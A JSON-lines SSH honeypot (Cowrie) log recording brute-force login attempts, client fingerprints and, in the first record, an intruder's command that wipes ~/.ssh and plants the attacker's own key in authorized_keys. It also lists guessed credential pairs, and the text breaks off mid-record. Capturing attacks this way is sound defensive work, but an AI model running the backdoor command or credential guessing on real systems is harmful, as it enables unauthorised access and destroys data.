{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T10:12:23.632339Z","src_ip":"212.227.235.229","session":"7ee0bab7f48e"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T10:12:23.893741Z","src_ip":"212.227.235.229","session":"7ee0bab7f48e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:12:23.896563Z","src_ip":"212.227.235.229","session":"7ee0bab7f48e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36528,"dst_ip":"1.2.3.4","dst_port":22,"session":"34f44cb7c695","protocol":"ssh","message":"New connection: 212.227.235.229:36528 (1.2.3.4:22) [session: 34f44cb7c695]","sensor":"my-vps","timestamp":"2025-09-09T10:12:24.147953Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T10:12:24.149226Z","src_ip":"212.227.235.229","session":"34f44cb7c695"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T10:12:24.422631Z","src_ip":"212.227.235.229","session":"34f44cb7c695"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T10:12:25.520536Z","src_ip":"212.227.235.229","session":"34f44cb7c695"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:12:26.792098Z","src_ip":"212.227.235.229","session":"34f44cb7c695"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36532,"dst_ip":"1.2.3.4","dst_port":22,"session":"e7f12b2157fc","protocol":"ssh","message":"New connection: 212.227.235.229:36532 (1.2.3.4:22) [session: e7f12b2157fc]","sensor":"my-vps","timestamp":"2025-09-09T10:12:27.041025Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T10:12:27.042136Z","src_ip":"212.227.235.229","session":"e7f12b2157fc"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T10:12:27.300380Z","src_ip":"212.227.235.229","session":"e7f12b2157fc"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T10:12:28.357510Z","src_ip":"212.227.235.229","session":"e7f12b2157fc"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:12:28.961929Z","src_ip":"212.227.235.229","session":"7ee0bab7f48e"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:12:28.963872Z","src_ip":"212.227.235.229","session":"e7f12b2157fc"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":473,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"180.2","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 180.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:12:28.969018Z","src_ip":"79.124.8.120","session":"ccff772905bb"}
{"eventid":"cowrie.session.closed","duration":180.3445761203766,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:12:28.977123Z","src_ip":"79.124.8.120","session":"ccff772905bb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35696,"dst_ip":"1.2.3.4","dst_port":22,"session":"f9249fbc5f4c","protocol":"ssh","message":"New connection: 212.227.235.229:35696 (1.2.3.4:22) [session: f9249fbc5f4c]","sensor":"my-vps","timestamp":"2025-09-09T10:12:30.604982Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T10:12:30.605965Z","src_ip":"212.227.235.229","session":"f9249fbc5f4c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T10:12:30.700671Z","src_ip":"212.227.235.229","session":"f9249fbc5f4c"}
{"eventid":"cowrie.login.failed","username":"hadoop","password":"hadoop.123","message":"login attempt [hadoop/hadoop.123] failed","sensor":"my-vps","timestamp":"2025-09-09T10:12:31.127442Z","src_ip":"212.227.235.229","session":"f9249fbc5f4c"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:12:32.225306Z","src_ip":"212.227.235.229","session":"f9249fbc5f4c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46482,"dst_ip":"1.2.3.4","dst_port":22,"session":"f417ca5247ee","protocol":"ssh","message":"New connection: 212.227.235.229:46482 (1.2.3.4:22) [session: f417ca5247ee]","sensor":"my-vps","timestamp":"2025-09-09T10:12:57.711087Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T10:12:57.717307Z","src_ip":"212.227.235.229","session":"f417ca5247ee"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T10:12:57.998192Z","src_ip":"212.227.235.229","session":"f417ca5247ee"}
{"eventid":"cowrie.login.failed","username":"dixi","password":"09N1RCa1Hs31","message":"login attempt [dixi/09N1RCa1Hs31] failed","sensor":"my-vps","timestamp":"2025-09-09T10:12:59.135125Z","src_ip":"212.227.235.229","session":"f417ca5247ee"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:13:00.675905Z","src_ip":"212.227.235.229","session":"f417ca5247ee"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38870,"dst_ip":"1.2.3.4","dst_port":22,"session":"5851d5a37de4","protocol":"ssh","message":"New connection: 212.227.125.160:38870 (1.2.3.4:22) [session: 5851d5a37de4]","sensor":"my-vps","timestamp":"2025-09-09T10:13:03.030097Z"}
{"eventid":"cowrie.client.version","version":"GET / HTTP/1.1","message":"Remote SSH version: GET / HTTP/1.1","sensor":"my-vps","timestamp":"2025-09-09T10:13:03.031054Z","src_ip":"212.227.125.160","session":"5851d5a37de4"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:13:03.031979Z","src_ip":"212.227.125.160","session":"5851d5a37de4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38876,"dst_ip":"1.2.3.4","dst_port":22,"session":"d9efa80fc261","protocol":"ssh","message":"New connection: 212.227.125.160:38876 (1.2.3.4:22) [session: d9efa80fc261]","sensor":"my-vps","timestamp":"2025-09-09T10:13:03.086447Z"}
{"eventid":"cowrie.client.version","version":"GET /favicon.ico HTTP/1.1","message":"Remote SSH version: GET /favicon.ico HTTP/1.1","sensor":"my-vps","timestamp":"2025-09-09T10:13:03.087555Z","src_ip":"212.227.125.160","session":"d9efa80fc261"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:13:03.088344Z","src_ip":"212.227.125.160","session":"d9efa80fc261"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51608,"dst_ip":"1.2.3.4","dst_port":22,"session":"a86774962a93","protocol":"ssh","message":"New connection: 212.227.235.229:51608 (1.2.3.4:22) [session: a86774962a93]","sensor":"my-vps","timestamp":"2025-09-09T10:13:08.395793Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T10:13:08.397079Z","src_ip":"212.227.235.229","session":"a86774962a93"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T10:13:08.657423Z","src_ip":"212.227.235.229","session":"a86774962a93"}
{"eventid":"cowrie.login.failed","username":"ahmed","password":"P@ssw0rd","message":"login attempt [ahmed/P@ssw0rd] failed","sensor":"my-vps","timestamp":"2025-09-09T10:13:09.700414Z","src_ip":"212.227.235.229","session":"a86774962a93"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:13:10.962253Z","src_ip":"212.227.235.229","session":"a86774962a93"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35712,"dst_ip":"1.2.3.4","dst_port":22,"session":"ab37ab719127","protocol":"ssh","message":"New connection: 212.227.235.229:35712 (1.2.3.4:22) [session: ab37ab719127]","sensor":"my-vps","timestamp":"2025-09-09T10:13:30.547827Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T10:13:30.553201Z","src_ip":"212.227.235.229","session":"ab37ab719127"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T10:13:30.654552Z","src_ip":"212.227.235.229","session":"ab37ab719127"}
{"eventid":"cowrie.login.failed","username":"access","password":"12345","message":"login attempt [access/12345] failed","sensor":"my-vps","timestamp":"2025-09-09T10:13:31.104221Z","src_ip":"212.227.235.229","session":"ab37ab719127"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56714,"dst_ip":"1.2.3.4","dst_port":22,"session":"f2c1ee1fd61b","protocol":"ssh","message":"New connection: 212.227.235.229:56714 (1.2.3.4:22) [session: f2c1ee1fd61b]","sensor":"my-vps","timestamp":"2025-09-09T10:13:32.123857Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T10:13:32.126426Z","src_ip":"212.227.235.229","session":"f2c1ee1fd61b"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:13:32.207476Z","src_ip":"212.227.235.229","session":"ab37ab719127"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T10:13:32.383936Z","src_ip":"212.227.235.229","session":"f2c1ee1fd61b"}
{"eventid":"cowrie.login.failed","username":"vahid","password":"123456","message":"login attempt [vahid/123456] failed","sensor":"my-vps","timestamp":"2025-09-09T10:13:33.405603Z","src_ip":"212.227.235.229","session":"f2c1ee1fd61b"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:13:34.672606Z","src_ip":"212.227.235.229","session":"f2c1ee1fd61b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50034,"dst_ip":"1.2.3.4","dst_port":22,"session":"d5747c1f7fa7","protocol":"ssh","message":"New connection: 212.227.235.229:50034 (1.2.3.4:22) [session: d5747c1f7fa7]","sensor":"my-vps","timestamp":"2025-09-09T10:14:27.659926Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T10:14:27.665126Z","src_ip":"212.227.235.229","session":"d5747c1f7fa7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T10:14:27.922242Z","src_ip":"212.227.235.229","session":"d5747c1f7fa7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35720,"dst_ip":"1.2.3.4","dst_port":22,"session":"379e34bfbb44","protocol":"ssh","message":"New connection: 212.227.235.229:35720 (1.2.3.4:22) [session: 379e34bfbb44]","sensor":"my-vps","timestamp":"2025-09-09T10:14:28.495166Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T10:14:28.498868Z","src_ip":"212.227.235.229","session":"379e34bfbb44"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac